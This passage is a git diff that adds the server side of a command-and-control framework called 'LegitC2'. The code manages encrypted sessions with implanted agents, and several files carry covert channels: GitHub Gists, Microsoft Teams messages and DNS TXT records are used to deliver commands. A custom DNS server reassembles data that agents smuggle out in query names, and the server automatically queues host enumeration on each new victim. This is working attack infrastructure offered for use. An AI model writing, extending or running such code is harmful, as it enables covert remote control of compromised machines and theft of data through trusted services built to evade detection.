str) -> Optional[AgentSession]: + return self._sessions.get(agent_id) + + def _ensure_session(self, agent_id: str) -> AgentSession: + if agent_id not in self._sessions: + self._sessions[agent_id] = AgentSession(agent_id) + return self._sessions[agent_id] + + # ---- Handshake ---- + + def process_handshake(self, b64_pkt: str, db: DBSession) -> dict: + """ + Process a plaintext handshake packet from the agent. + Returns the base64 handshake response to write back to the agent channel. + """ + try: + pkt = decode_handshake_packet(b64_pkt) + except Exception: + return {"response": None, "events": []} + + if pkt.get("t") != "h": + return {"response": None, "events": []} + + agent_id = pkt.get("id", "") + if not agent_id: + return {"response": None, "events": []} + + agent_pubkey_b64 = pkt.get("pk", "") + try: + agent_pubkey_bytes = base64.b64decode(agent_pubkey_b64) + except Exception: + return {"response": None, "events": []} + + session = self._ensure_session(agent_id) + + # Generate server keypair + derive session key + server_pubkey_bytes = session.crypto.generate_keypair() + session.crypto.do_handshake(agent_pubkey_bytes) + + # Persist to DB + db_agent = db.get(Agent, agent_id) + is_new = db_agent is None + if db_agent is None: + db_agent = Agent(agent_id=agent_id) + db.add(db_agent) + + db_agent.server_pubkey = server_pubkey_bytes.hex() + db_agent.server_privkey = session.crypto.server_privkey_hex() + db_agent.session_key = session.crypto.session_key_hex() + db_agent.handshake_done = True + db_agent.last_seen = datetime.utcnow() + + log = Log(agent_id=agent_id, event="handshake_complete", + detail=f"session key derived") + db.add(log) + db.commit() + + events = [{"type": "agent_new" if is_new else "agent_handshake", "agent_id": agent_id}] + return {"response": build_handshake_response(server_pubkey_bytes), "events": events} + + # ---- Beacon processing ---- + + def process_beacon(self, agent_id: str, b64_pkt: str, db: DBSession, client_ip: str = "") -> dict: + """ + Decrypt an encrypted beacon from the agent, update DB. + Returns {"events": [...]} for WebSocket broadcast. + """ + events = [] + + session = self.get_session(agent_id) + if session is None: + db_agent = db.get(Agent, agent_id) + if db_agent and db_agent.handshake_done: + session = AgentSession.from_db(db_agent) + self._sessions[agent_id] = session + else: + return {"events": events} + + try: + beacon = session.crypto.open_json(b64_pkt) + except Exception as e: + import logging + logging.getLogger("agent_manager").warning("beacon decrypt failed for %s: %s", agent_id, e) + return {"events": events} + + # Update agent record + db_agent = db.get(Agent, agent_id) + if db_agent is None: + return {"events": events} + + # Reset stale "sent" tasks — agent may have restarted without acking them + stale_cutoff = datetime.utcnow() - timedelta(seconds=90) + stale = ( + db.query(Task) + .filter(Task.agent_id == agent_id, + Task.status == "sent", + Task.sent_at < stale_cutoff) + .all() + ) + for t in stale: + t.status = "pending" + t.sent_at = None + + db_agent.hostname = beacon.get("hn", db_agent.hostname) + db_agent.username = beacon.get("un", db_agent.username) + db_agent.os_info = beacon.get("os", db_agent.os_info) + db_agent.privileges = beacon.get("pr", db_agent.privileges) + db_agent.last_seen = datetime.utcnow() + db_agent.is_active = True + if client_ip: + db_agent.ip = client_ip + + pid_val = beacon.get("pid", "") + if pid_val and pid_val != db_agent.agent_id: + db_agent.parent_id = pid_val + + # Auto-enum on first beacon + if not db_agent.auto_enum_done: + _AUTO_CMDS = [("sysinfo", ""), ("ps", "")] + for _cmd, _args in _AUTO_CMDS: + db.add(Task( + task_id = str(__import__("uuid").uuid4()), + agent_id = agent_id, + cmd = _cmd, + args = _args, + status = "pending", + )) + db.add(Log(agent_id=agent_id, event="auto_enum", + detail="queued: " + ", ".join(c for c, _ in _AUTO_CMDS))) + db_agent.auto_enum_done = True + + events.append({ + "type": "agent_seen", + "agent_id": agent_id, + "last_seen": db_agent.last_seen.isoformat(), + "is_active": True, + }) + + # ACK last task + last_task_id = beacon.get("lt", "") + acked_task = None + if last_task_id: + task = db.get(Task, last_task_id) + if task and task.status == "sent": + task.status = "acked" + task.acked_at = datetime.utcnow() + acked_task = task + + # Store pending output + pending_output = beacon.get("po", "") + if pending_output and last_task_id: + task = db.get(Task, last_task_id) + if task: + task.output = pending_output + log = Log(agent_id=agent_id, event="task_output", + detail=f"task_id={last_task_id} len={len(pending_output)}") + db.add(log) + if acked_task and acked_task.task_id == last_task_id: + events.append({ + "type": "task_acked", + "agent_id": agent_id, + "task_id": last_task_id, + "cmd": acked_task.cmd, + "output": pending_output, + }) + + db.commit() + return {"events": events} + + # ---- Task dispatch ---- + + def get_pending_task_packet(self, agent_id: str, db: DBSession) -> Optional[str]: + """ + If there's a pending task for this agent, encrypt it and return base64. + Returns None if no pending task. + """ + session = self.get_session(agent_id) + if session is None or not session.crypto.ready: + return None + + # Find oldest pending task + task = ( + db.query(Task) + .filter(Task.agent_id == agent_id, Task.status == "pending") + .order_by(Task.created_at) + .first() + ) + if task is None: + return None + + task.status = "sent" + task.sent_at = datetime.utcnow() + db.commit() + + # Mark on agent record + db_agent = db.get(Agent, agent_id) + if db_agent: + db_agent.pending_task_id = task.task_id + db.commit() + + return session.crypto.seal_json(task.to_wire()) + + # ---- Load sessions from DB on startup ---- + + def load_from_db(self, db: DBSession) -> None: + agents = db.query(Agent).filter(Agent.handshake_done == True).all() + for a in agents: + session = AgentSession.from_db(a) + self._sessions[a.agent_id] = session + + +# Singleton +manager = AgentManager() diff --git a/server/services/channel_reader.py b/server/services/channel_reader.py new file mode 100644 index 0000000..548f3cf --- /dev/null +++ b/server/services/channel_reader.py @@ -0,0 +1,517 @@ +""" +Background task: polls GitHub Gist (primary channel) every N seconds, +processes agent beacons, and writes pending task responses. + +DoH command delivery (C2 → Agent): + Server writes TXT record cmd.{agent_id}.khaotic.fr via IONOS DNS API. + Agent queries Cloudflare DoH and reads it. + Exfil direction (Agent → C2) uses GitHub Gist — DoH can't intercept queries + without being the authoritative NS. +""" +import asyncio +import base64 +import json +import logging +from typing import Optional + +import httpx +from sqlalchemy.orm import Session as DBSession + +from datetime import datetime, timezone + +from models.agent import Agent, Base +from models.log import Log +from services.agent_manager import manager as agent_manager +import services.dns_server as _dns # shared dns_pending_tasks dict + +logger = logging.getLogger("channel_reader") + +POLL_INTERVAL = 15 # seconds + +# GitHub Gist channel + +class GistChannel: + """ + GitHub Gist poller. + gist_out: agents upload beacons here (file: {agent_id}_1x.bin) + gist_cmd: server writes tasks here (file: {agent_id}_0x.bin) + """ + + def __init__(self, token: str, gist_out_id: str, gist_cmd_id: str): + self.token = token + self.gist_out_id = gist_out_id + self.gist_cmd_id = gist_cmd_id + self._headers = { + "Authorization": f"token {token}", + "Accept": "application/vnd.github+json", + "X-GitHub-Api-Version": "2022-11-28", + "User-Agent": "Mozilla/5.0 (compatible; legitc2-server/1.0)", + } + + async def _get_gist(self, gist_id: str) -> Optional[dict]: + url = f"https://api.github.com/gists/{gist_id}" + async with httpx.AsyncClient(timeout=30) as client: + try: + r = await client.get(url, headers=self._headers) + if r.status_code == 200: + return r.json() + except Exception as e: + logger.warning("gist GET failed: %s", e) + return None + + async def _patch_gist(self, gist_id: str, filename: str, content: str) -> bool: + url = f"https://api.github.com/gists/{gist_id}" + body = {"files": {filename: {"content": content}}} + async with httpx.AsyncClient(timeout=30) as client: + try: + r = await client.patch(url, headers=self._headers, json=body) + return r.status_code in (200, 201) + except Exception as e: + logger.warning("gist PATCH failed: %s", e) + return False + + async def read_all_beacons(self) -> dict[str, str]: + """Return {agent_id: b64_packet} for every _1x.bin file in gist_out.""" + gist = await self._get_gist(self.gist_out_id) + if not gist: + return {} + result = {} + for fname, fdata in gist.get("files", {}).items(): + if fname.endswith("_1x.bin"): + agent_id = fname[:-7] # strip _1x.bin + content = (fdata.get("content") or "").strip() + if content and content != "null": + result[agent_id] = content + return result + + async def write_task(self, agent_id: str, b64_task: str) -> bool: + filename = f"{agent_id}_0x.bin" + return await self._patch_gist(self.gist_cmd_id, filename, b64_task) + + async def clear_beacon(self, agent_id: str) -> bool: + filename = f"{agent_id}_1x.bin" + return await self._patch_gist(self.gist_out_id, filename, "null") + +# IONOS DNS channel — writes TXT records for DoH command delivery + +class IonosDnsChannel: + """ + IONOS DNS API v1 — manages TXT records for the DoH fallback channel. + + C2 → Agent flow: + write_cmd_record(agent_id, b64_task) + → creates/updates TXT record: cmd.{agent_id}.{domain} = b64_task + → agent queries Cloudflare DoH and reads it + + clear_cmd_record(agent_id) + → deletes the TXT record after the agent has acknowledged the task + + API key format (IONOS developer console): "{prefix}.{secret}" + """ + + BASE_URL = "https://api.hosting.ionos.com/dns/v1" + + def __init__(self, api_key: str, domain: str): + self.api_key = api_key + self.domain = domain.rstrip(".") + self._headers = { + "X-API-Key": api_key, + "Accept": "application/json", + "Content-Type": "application/json", + } + self._zone_id: Optional[str] = None + + async def _get_zone_id(self) -> Optional[str]: + if self._zone_id: + return self._zone_id + url = f"{self.BASE_URL}/zones" + async with httpx.AsyncClient(timeout=15) as client: + try: + r = await client.get(url, headers=self._headers) + if r.status_code != 200: + logger.warning("ionos GET /zones → %d", r.status_code) + return None + for zone in r.json(): + if zone.get("name", "").rstrip(".") == self.domain: + self._zone_id = zone["id"] + logger.info("ionos zone_id for %s = %s", self.domain, self._zone_id) + return self._zone_id + logger.warning("ionos: zone %s not found", self.domain) + except Exception as e: + logger.warning("ionos _get_zone_id: %s", e) + return None + + async def _find_record(self, name: str) -> Optional[str]: + """Return record ID for an existing TXT record with given name, or None.""" + zone_id = await self._get_zone_id() + if not zone_id: + return None + url = f"{self.BASE_URL}/zones/{zone_id}" + async with httpx.AsyncClient(timeout=15) as client: + try: + r = await client.get(url, headers=self._headers) + if r.status_code != 200: + return None + for rec in r.json().get("records", []): + if rec.get("type") == "TXT" and rec.get("name", "").rstrip(".") == name.rstrip("."): + return rec["id"] + except Exception as e: + logger.warning("ionos _find_record: %s", e) + return None + + async def write_cmd_record(self, agent_id: str, b64_task: str) -> bool: + """Create or update TXT record cmd.{agent_id}.{domain} = b64_task (TTL 60s).""" + zone_id = await self._get_zone_id() + if not zone_id: + return False + + fqdn = f"cmd.{agent_id}.{self.domain}" + existing_id = await self._find_record(fqdn) + + async with httpx.AsyncClient(timeout=15) as client: + try: + if existing_id: + # PUT updates a single record + url = f"{self.BASE_URL}/zones/{zone_id}/records/{existing_id}" + body = { + "name": fqdn, + "type": "TXT", + "content": b64_task, + "ttl": 60, + "prio": 0, + "disabled": False, + } + r = await client.put(url, headers=self._headers, json=body) + else: + # POST creates records (array) + url = f"{self.BASE_URL}/zones/{zone_id}/records" + body = [{ + "name": fqdn, + "type": "TXT", + "content": b64_task, + "ttl": 60, + "prio": 0, + "disabled": False, + }] + r = await client.post(url, headers=self._headers, json=body) + + ok = r.status_code in (200, 201) + if not ok: + logger.warning("ionos write TXT %s → %d: %s", fqdn, r.status_code, r.text[:200]) + else: + logger.info("ionos TXT written: %s", fqdn) + return ok + except Exception as e: + logger.warning("ionos write_cmd_record: %s", e) + return False + + async def clear_cmd_record(self, agent_id: str) -> bool: + """Delete cmd TXT record once agent has acknowledged the task.""" + zone_id = await self._get_zone_id() + if not zone_id: + return False + + fqdn = f"cmd.{agent_id}.{self.domain}" + existing_id = await self._find_record(fqdn) + if not existing_id: + return True # already gone — fine + + url = f"{self.BASE_URL}/zones/{zone_id}/records/{existing_id}" + async with httpx.AsyncClient(timeout=15) as client: + try: + r = await client.delete(url, headers=self._headers) + ok = r.status_code in (200, 204) + if ok: + logger.info("ionos TXT cleared: %s", fqdn) + return ok + except Exception as e: + logger.warning("ionos clear_cmd_record: %s", e) + return False + + +# Microsoft Teams channel (Graph API, app-only auth) + +class TeamsChannel: + """ + Bidirectional Teams channel via Microsoft Graph API. + + Agent→Server : agent posts "LC2:{agent_id}:{b64_beacon}" + Server→Agent : server posts "TASK:{agent_id}:{b64_task}" + + Uses client_credentials flow — requires ChannelMessage.Read.All + and ChannelMessage.Send application permissions in Azure AD. + + Deduplication: in-memory set of processed message IDs. + On first poll, existing messages are marked seen without processing + so a server restart never replays stale beacons. + """ + + GRAPH = "https://graph.microsoft.com/v1.0" + + def __init__(self, tenant_id: str, client_id: str, client_secret: str, + team_id: str, channel_id: str): + self.tenant_id = tenant_id + self.client_id = client_id + self.client_secret = client_secret + self.team_id = team_id + self.channel_id = channel_id + self._token: Optional[str] = None + self._token_exp: float = 0.0 + self._seen_ids: set[str] = set() + self._primed = False # True after first poll drains existing msgs + + async def _get_token(self) -> Optional[str]: + """Return cached OAuth2 token, refreshing if expired (with 60s buffer).""" + import time + if self._token and time.time() < self._token_exp - 60: + return self._token + + url = f"https://login.microsoftonline.com/{self.tenant_id}/oauth2/v2.0/token" + body = { + "grant_type": "client_credentials", + "client_id": self.client_id, + "client_secret": self.client_secret, + "scope": "https://graph.microsoft.com/.default", + } + async with httpx.AsyncClient(timeout=30) as client: + try: + r = await client.post(url, data=body) + if r.status_code != 200: + logger.warning("teams token: %d %s", r.status_code, r.text[:200]) + return None + data = r.json() + self._token = data.get("access_token") + self._token_exp = time.time() + data.get("expires_in", 3600) + return self._token + except Exception as e: + logger.warning("teams _get_token: %s", e) + return None + + async def _graph_get(self, path: str) -> Optional[dict]: + token = await self._get_token() + if not token: + return None + headers = { + "Authorization": f"Bearer {token}", + "Accept": "application/json", + } + async with httpx.AsyncClient(timeout=30) as client: + try: + r = await client.get(f"{self.GRAPH}{path}", headers=headers) + if r.status_code == 200: + return r.json() + logger.warning("teams GET %s → %d", path, r.status_code) + except Exception as e: + logger.warning("teams _graph_get: %s", e) + return None + + async def _graph_post(self, path: str, body: dict) -> bool: + token = await self._get_token() + if not token: + return False + headers = { + "Authorization": f"Bearer {token}", + "Content-Type": "application/json", + } + async with httpx.AsyncClient(timeout=30) as client: + try: + r = await client.post(f"{self.GRAPH}{path}", headers=headers, json=body) + ok = r.status_code in (200, 201) + if not ok: + logger.warning("teams POST %s → %d %s", path, r.status_code, r.text[:200]) + return ok + except Exception as e: + logger.warning("teams _graph_post: %s", e) + return False + + async def read_beacons(self) -> dict[str, str]: + """ + Fetch recent channel messages, extract LC2 beacons not yet processed. + First call marks all existing messages as seen without processing them. + Returns {agent_id: b64_packet}. + """ + path = ( + f"/teams/{self.team_id}/channels/{self.channel_id}/messages" + "?$top=20&$orderby=createdDateTime+desc" + ) + data = await self._graph_get(path) + if not data: + return {} + + messages = data.get("value", []) + result = {} + + for msg in reversed(messages): # oldest first so we process in order + msg_id = msg.get("id", "") + if not msg_id or msg_id in self._seen_ids: + continue + self._seen_ids.add(msg_id) + + if not self._primed: + # First poll: drain without processing + continue + + # Extract plain-text body + body_content = (msg.get("body") or {}).get("content", "") + # Strip basic HTML tags Teams sometimes wraps content in + import re as _re + text = _re.sub(r"<[^>]+>", "", body_content).strip() + + if not text.startswith("LC2:"): + continue + + parts = text.split(":", 2) # ["LC2", agent_id, b64] + if len(parts) != 3: + continue + _, agent_id, b64 = parts + if agent_id and b64: + result[agent_id] = b64 + logger.info("teams beacon from %s (msg %s)", agent_id, msg_id) + + if not self._primed: + self._primed = True + logger.info("teams channel primed — %d existing messages marked seen", + len(messages)) + + return result + + async def write_task(self, agent_id: str, b64_task: str) -> bool: + """Post TASK message to Teams channel (agent reads it via Graph poll).""" + path = f"/teams/{self.team_id}/channels/{self.channel_id}/messages" + body = { + "body": { + "contentType": "text", + "content": f"TASK:{agent_id}:{b64_task}", + } + } + return await self._graph_post(path, body) + +# Channel orchestrator + +class ChannelReader: + def __init__(self, config: dict, db_session_factory): + self.config = config + self.db_factory = db_session_factory + self._gist: Optional[GistChannel] = None + self._ionos: Optional[IonosDnsChannel] = None + self._teams: Optional[TeamsChannel] = None + self._running = False + + def _init_channels(self) -> None: + channels = self.config.get("channels", {}) + + # GitHub Gist + gh = channels.get("github", {}) + if gh.get("token") and gh.get("gist_out") and gh.get("gist_cmd"): + self._gist = GistChannel(gh["token"], gh["gist_out"], gh["gist_cmd"]) + logger.info("channel: GitHub Gist enabled") + + # IONOS DNS + doh = channels.get("doh", {}) + api_key = doh.get("ionos_api_key", "") + domain = doh.get("domain", "") + if api_key and domain and "." in api_key: # valid key has prefix.secret + self._ionos = IonosDnsChannel(api_key, domain) + logger.info("channel: IONOS DNS enabled (domain=%s)", domain) + + # Microsoft Teams + tm = channels.get("teams", {}) + _required = ("tenant_id", "client_id", "client_secret", "team_id", "channel_id") + if all(tm.get(k, "").strip() and tm.get(k) != f"TEAMS_{k.upper()}" + for k in _required): + self._teams = TeamsChannel( + tm["tenant_id"], tm["client_id"], tm["client_secret"], + tm["team_id"], tm["channel_id"], + ) + logger.info("channel: Microsoft Teams enabled (team=%s)", tm["team_id"]) + + async def _write_task_all_channels(self, agent_id: str, b64_task: str) -> None: + """Push task to every available channel in parallel.""" + # Always populate DNS pending_tasks so DoH fallback works + _dns.dns_pending_tasks[agent_id] = b64_task + + coros = [] + if self._gist: + coros.append(self._gist.write_task(agent_id, b64_task)) + if self._ionos: + coros.append(self._ionos.write_cmd_record(agent_id, b64_task)) + if self._teams: + coros.append(self._teams.write_task(agent_id, b64_task)) + if coros: + await asyncio.gather(*coros, return_exceptions=True) + + async def _process_packet(self, agent_id: str, b64_pkt: str, db: DBSession) -> None: + """Route a raw b64 packet: handshake vs encrypted beacon.""" + try: + raw = base64.b64decode(b64_pkt) + payload = json.loads(raw.decode()) + pkt_type = payload.get("t", "") + except Exception: + pkt_type = "encrypted" + + if pkt_type == "h": + resp = agent_manager.process_handshake(b64_pkt, db) + if resp: + await self._write_task_all_channels(agent_id, resp) + return + + # Encrypted beacon + agent_manager.process_beacon(agent_id, b64_pkt, db) + + # Dispatch pending task or noop + task_pkt = agent_manager.get_pending_task_packet(agent_id, db) + if task_pkt: + await self._write_task_all_channels(agent_id, task_pkt) + else: + noop_pkt = _build_noop_packet(agent_id, db) + if noop_pkt: + await self._write_task_all_channels(agent_id, noop_pkt) + + async def poll_once(self) -> None: + # Collect beacons per channel, tracking source for post-process cleanup + gist_beacons: dict[str, str] = {} + teams_beacons: dict[str, str] = {} + + if self._gist: + gist_beacons = await self._gist.read_all_beacons() + if self._teams: + teams_beacons = await self._teams.read_beacons() + + # Merge: Gist takes priority over Teams for the same agent_id + all_beacons = {**teams_beacons, **gist_beacons} + if not all_beacons: + return + + db: DBSession = self.db_factory() + try: + for agent_id, b64_pkt in all_beacons.items(): + try: + await self._process_packet(agent_id, b64_pkt, db) + if agent_id in gist_beacons and self._gist: + await self._gist.clear_beacon(agent_id) + except Exception as e: + logger.error("error processing beacon for %s: %s", agent_id, e) + finally: + db.close() + + async def run(self) -> None: + self._init_channels() + self._running = True + logger.info("channel_reader started (interval=%ds)", POLL_INTERVAL) + while self._running: + try: + await self.poll_once() + except Exception as e: + logger.error("poll_once error: %s", e) + await asyncio.sleep(POLL_INTERVAL) + + def stop(self) -> None: + self._running = False + + +def _build_noop_packet(agent_id: str, db: DBSession) -> Optional[str]: + from services.agent_manager import manager + session = manager.get_session(agent_id) + if session is None or not session.crypto.ready: + return None + return session.crypto.seal_json({"t": "n"}) diff --git a/server/services/crypto.py b/server/services/crypto.py new file mode 100644 index 0000000..96d40ff --- /dev/null +++ b/server/services/crypto.py @@ -0,0 +1,134 @@ +""" +Server-side cryptography mirror of the agent's C implementation. +Algorithm chain: ECDH X25519 → HKDF-SHA256 → ChaCha20-Poly1305 +Library: PyCA cryptography +""" +from __future__ import annotations +import base64 +import json +import os +from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey, X25519PublicKey +from cryptography.hazmat.primitives.kdf.hkdf import HKDF +from cryptography.hazmat.primitives.hashes import SHA256 +from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305 +from cryptography.hazmat.primitives.serialization import ( + Encoding, PublicFormat, PrivateFormat, NoEncryption +) + + +NONCE_SIZE = 12 +TAG_SIZE = 16 +KEY_SIZE = 32 +HKDF_INFO = b"kdf-sess-v1" + + +class AgentCrypto: + """Holds ECDH keypair + derived session key for one agent.""" + + def __init__(self): + self._priv: X25519PrivateKey | None = None + self._session_key: bytes | None = None + + # ---- Keypair ---- + + def generate_keypair(self) -> bytes: + """Generate server ECDH keypair. Returns 32-byte raw public key.""" + self._priv = X25519PrivateKey.generate() + return self._priv.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw) + + def server_pubkey_bytes(self) -> bytes: + if self._priv is None: + raise RuntimeError("keypair not generated") + return self._priv.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw) + + def server_privkey_hex(self) -> str: + if self._priv is None: + raise RuntimeError("keypair not generated") + return self._priv.private_bytes(Encoding.Raw, PrivateFormat.Raw, NoEncryption()).hex() + + # ---- Handshake ---- + + def do_handshake(self, agent_pubkey_bytes: bytes) -> None: + """Perform ECDH + HKDF, derive session key from agent's raw public key.""" + if self._priv is None: + raise RuntimeError("generate_keypair() must be called first") + agent_pub = X25519PublicKey.from_public_bytes(agent_pubkey_bytes) + shared = self._priv.exchange(agent_pub) + hkdf = HKDF( + algorithm=SHA256(), + length=KEY_SIZE, + salt=None, + info=HKDF_INFO, + ) + self._session_key = hkdf.derive(shared) + + def load_from_hex(self, privkey_hex: str, session_key_hex: str) -> None: + """Restore crypto state from DB-persisted hex strings.""" + raw_priv = bytes.fromhex(privkey_hex) + self._priv = X25519PrivateKey.from_private_bytes(raw_priv) + if session_key_hex: + self._session_key = bytes.fromhex(session_key_hex) + + def session_key_hex(self) -> str: + if self._session_key is None: + return "" + return self._session_key.hex() + + @property + def ready(self) -> bool: + return self._session_key is not None + + # ---- Encryption / Decryption ---- + + def seal(self, plaintext: bytes) -> str: + """Encrypt bytes, return base64 string (nonce|ct|tag).""" + if not self.ready: + raise RuntimeError("session key not established") + nonce = os.urandom(NONCE_SIZE) + aead = ChaCha20Poly1305(self._session_key) + ct = aead.encrypt(nonce, plaintext, None) # ct includes tag + blob = nonce + ct + return base64.b64encode(blob).decode() + + def open(self, b64_blob: str) -> bytes: + """Decrypt base64 blob (nonce|ct|tag), return plaintext bytes.""" + if not self.ready: + raise RuntimeError("session key not established") + blob = base64.b64decode(b64_blob) + nonce = blob[:NONCE_SIZE] + ct = blob[NONCE_SIZE:] + aead = ChaCha20Poly1305(self._session_key) + return aead.decrypt(nonce, ct, None) + + # ---- JSON packet helpers ---- + + def seal_json(self, payload: dict) -> str: + """Encrypt a dict as JSON, return base64.""" + return self.seal(json.dumps(payload).encode()) + + def open_json(self, b64_blob: str) -> dict: + """Decrypt a base64 blob, parse as JSON dict.""" + return json.loads(self.open(b64_blob).decode()) + + +# Standalone helpers + +def decode_handshake_packet(b64_pkt: str) -> dict: + """ + Decode a plaintext (non-encrypted) handshake packet from the agent. + Format: base64({"t":"h","id":"...","pk":""}) + """ + raw = base64.b64decode(b64_pkt) + return json.loads(raw.decode()) + + +def build_handshake_response(server_pubkey_bytes: bytes) -> str: + """ + Build a plaintext handshake response for the agent. + Returns base64({"t":"hr","spk":""}) + """ + payload = { + "t": "hr", + "spk": base64.b64encode(server_pubkey_bytes).decode(), + } + return base64.b64encode(json.dumps(payload).encode()).decode() diff --git a/server/services/dns_server.py b/server/services/dns_server.py new file mode 100644 index 0000000..6db8568 --- /dev/null +++ b/server/services/dns_server.py @@ -0,0 +1,189 @@ +""" +Authoritative DNS server for the DoH C2 channel. + +Listens on UDP port 53 for queries delegated from c2.khaotic.fr. + +RECEIVE (agent → server): + Agent chunks the b64 payload as base32 DNS labels: + {b32chunk}.{seq:02d}.out.{agent_id}.c2.khaotic.fr + Sentinel when done: + done.99.out.{agent_id}.c2.khaotic.fr + Server reassembles chunks, decodes, routes through agent_manager. + +SEND (server → agent): + Server populates dns_pending_tasks[agent_id] = b64_encrypted_task + Agent queries: cmd.{agent_id}.c2.khaotic.fr (TXT) + Server returns the task as TXT record (TTL=10s). + After task ACK the entry is cleared. + +Integration: + dns_pending_tasks is a module-level dict shared with channel_reader. + channel_reader writes tasks into it; DNS server reads and clears. +""" + +import asyncio +import base64 +import logging +import re +from typing import Optional + +from dnslib import DNSRecord, RR, QTYPE, TXT + +logger = logging.getLogger("dns_server") + +# Shared pending tasks: {agent_id: b64_encrypted_task} +# Written by channel_reader, read and cleared by dns_server on delivery. +dns_pending_tasks: dict[str, str] = {} + +# In-flight beacon chunks: {agent_id: {seq: b32_chunk_str}} +_chunk_store: dict[str, dict[int, str]] = {} + + +class C2DnsProtocol(asyncio.DatagramProtocol): + """Asyncio UDP handler — one instance per listening socket.""" + + def __init__(self, domain: str, db_factory): + self.domain = domain.lower().rstrip(".") + self.db_factory = db_factory + self.transport: Optional[asyncio.DatagramTransport] = None + + esc = re.escape(self.domain) + # cmd.{8hex}.{domain} + self._re_cmd = re.compile( + r"^cmd\.([a-f0-9]{8})\." + esc + r"\.?$", re.IGNORECASE + ) + # {b32}.{seq}.out.{8hex}.{domain} + self._re_out = re.compile( + r"^([a-z2-7]+)\.(\d+)\.out\.([a-f0-9]{8})\." + esc + r"\.?$", + re.IGNORECASE, + ) + # done.99.out.{8hex}.{domain} + self._re_done = re.compile( + r"^done\.99\.out\.([a-f0-9]{8})\." + esc + r"\.?$", + re.IGNORECASE, + ) + + def connection_made(self, transport: asyncio.DatagramTransport): + self.transport = transport + logger.info("DNS server ready on UDP :53 for %s", self.domain) + + def datagram_received(self, data: bytes, addr: tuple): + try: + request = DNSRecord.parse(data) + reply = request.reply() + qname = str(request.q.qname).rstrip(".") + qtype = request.q.qtype + + if qtype == QTYPE.TXT: + self._handle_txt(qname, reply) + + self.transport.sendto(reply.pack(), addr) + except Exception as e: + logger.debug("DNS datagram error from %s: %s", addr, e) + + def _handle_txt(self, qname: str, reply: DNSRecord): + # ---- cmd query → return pending task ---- + m = self._re_cmd.match(qname) + if m: + agent_id = m.group(1).lower() + task = dns_pending_tasks.get(agent_id) + if task: + reply.add_answer( + RR(qname, QTYPE.TXT, rdata=TXT(task.encode()), ttl=10) + ) + logger.info("DNS: task delivered to %s via TXT", agent_id) + return + + # ---- done sentinel → reassemble beacon ---- + m = self._re_done.match(qname) + if m: + agent_id = m.group(1).lower() + asyncio.ensure_future(self._reassemble(agent_id)) + return + + # ---- data chunk → store ---- + m = self._re_out.match(qname) + if m: + chunk = m.group(1).lower() + seq = int(m.group(2)) + agent_id = m.group(3).lower() + if agent_id not in _chunk_store: + _chunk_store[agent_id] = {} + _chunk_store[agent_id][seq] = chunk + logger.debug("DNS: chunk seq=%d stored for %s", seq, agent_id) + + async def _reassemble(self, agent_id: str): + chunks = _chunk_store.pop(agent_id, {}) + if not chunks: + logger.warning("DNS: reassemble called but no chunks for %s", agent_id) + return + + # Sort by seq → base32-decode each chunk → join → recover b64 payload + parts: list[bytes] = [] + for seq in sorted(chunks.keys()): + raw = chunks[seq].upper() + # Pad to multiple of 8 for stdlib base32 + pad = (8 - len(raw) % 8) % 8 + try: + parts.append(base64.b32decode(raw + "=" * pad)) + except Exception as e: + logger.warning("DNS: b32 decode error seq=%d agent=%s: %s", seq, agent_id, e) + return + + b64_payload = b"".join(parts).decode("ascii", errors="replace") + logger.info("DNS: reassembled beacon for %s (%d chars)", agent_id, len(b64_payload)) + + loop = asyncio.get_event_loop() + await loop.run_in_executor(None, self._process_beacon, agent_id, b64_payload) + + def _process_beacon(self, agent_id: str, b64_payload: str): + from services.agent_manager import manager + + db = self.db_factory() + try: + pkt_type = _detect_type(b64_payload) + + if pkt_type == "h": + resp = manager.process_handshake(b64_payload, db) + if resp: + dns_pending_tasks[agent_id] = resp + else: + manager.process_beacon(agent_id, b64_payload, db) + task_pkt = manager.get_pending_task_packet(agent_id, db) + if task_pkt: + dns_pending_tasks[agent_id] = task_pkt + else: + session = manager.get_session(agent_id) + if session and session.crypto.ready: + dns_pending_tasks[agent_id] = session.crypto.seal_json({"t": "n"}) + + except Exception as e: + logger.error("DNS: process_beacon error agent=%s: %s", agent_id, e) + finally: + db.close() + + +def _detect_type(b64: str) -> str: + import json as _json + try: + raw = base64.b64decode(b64) + payload = _json.loads(raw.decode()) + return payload.get("t", "encrypted") + except Exception: + return "encrypted" + + +async def start_dns_server(domain: str, db_factory, + host: str = "0.0.0.0", port: int = 53): + """ + Start the UDP DNS server. + Returns the asyncio transport (call transport.close() to stop). + Port 53 requires root or cap_net_bind_service on Linux. + """ + loop = asyncio.get_event_loop() + transport, _ = await loop.create_datagram_endpoint( + lambda: C2DnsProtocol(domain, db_factory), + local_addr=(host, port), + family=__import__("socket").AF_INET, + ) + return transport diff --git a/server/services/ws_manager.py b/server/services/ws_manager.py new file mode 100644 index 0000000..0acba36 --- /dev/null +++ b/server/services/ws_manager.py @@ -0,0 +1,43 @@ +""" +WebSocket broadcast manager — pushes real-time events to all connected operator UIs. +""" +import json +import logging +from typing import List + +from fastapi import WebSocket + +logger = logging.getLogger("ws_manager") + + +class WSManager: + def __init__(self): + self._conns: List[WebSocket] = [] + + async def connect(self, ws: WebSocket) -> None: + await ws.accept() + self._conns.append(ws) + logger.debug("WS connected — %d total", len(self._conns)) + + def disconnect(self, ws: WebSocket) -> None: + try: + self._conns.remove(ws) + except ValueError: + pass + logger.debug("WS disconnected — %d total", len(self._conns)) + + async def broadcast(self, event: dict) -> None: + if not self._conns: + return + payload = json.dumps(event) + dead = [] + for ws in list(self._conns): + try: + await ws.send_text(payload) + except Exception: + dead.append(ws) + for ws in dead: + self.disconnect(ws) + + +ws_manager = WSManager() diff --git a/server/start.ps1 b/server/start.ps1 new file mode 100644 index 0000000..958bc67 --- /dev/null +++ b/server/start.ps1 @@ -0,0 +1,29 @@ +# LegitC2 team server — Windows start script +# Usage: +# .\start.ps1 -> HTTPS port 8443 (cert.pem / key.pem) +# .\start.ps1 -Dev -> HTTP port 8000 (local testing) + +param([switch]$Dev) + +$root = Split-Path -Parent $MyInvocation.MyCommand.Path +Set-Location $root + +if ($Dev) { + Write-Host "[start] DEV mode — HTTP 0.0.0.0:8000" + & "venv\Scripts\python.exe" -m uvicorn main:app ` + --host 0.0.0.0 ` + --port 8000 ` + --log-level info +} else { + if (-not (Test-Path "cert.pem") -or -not (Test-Path "key.pem")) { + 